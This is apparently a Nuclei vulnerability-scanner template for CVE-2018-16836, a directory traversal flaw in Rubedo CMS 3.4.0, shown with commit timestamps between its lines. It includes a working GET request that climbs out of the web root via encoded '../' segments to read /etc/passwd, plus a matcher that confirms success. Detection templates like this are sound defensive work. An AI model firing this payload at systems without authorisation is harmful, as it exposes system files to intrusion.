2021-09-21 10:50:24 +00:00
id : CVE-2018-16836
2021-06-10 10:08:37 +00:00
info :
name : Rubedo CMS 3.4.0 - Directory Traversal
author : 0x_Akoko
2021-09-22 10:21:33 +00:00
severity : critical
2021-06-10 10:08:37 +00:00
reference : https://www.exploit-db.com/exploits/45385
2021-09-21 10:47:16 +00:00
tags : cve,cve2018,rubedo,lfi
2021-09-22 10:21:33 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.80
cve-id : CVE-2018-16836
cwe-id : CWE-22
description : "Rubedo through 3.4.0 contains a Directory Traversal vulnerability in the theme component, allowing unauthenticated attackers to read and execute arbitrary files outside of the service root path, as demonstrated by a /theme/default/img/%2e%2e/..//etc/passwd URI."
2021-06-10 10:08:37 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
matchers-condition : and
matchers :
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-06-10 10:08:37 +00:00
- type : status
status :
- 200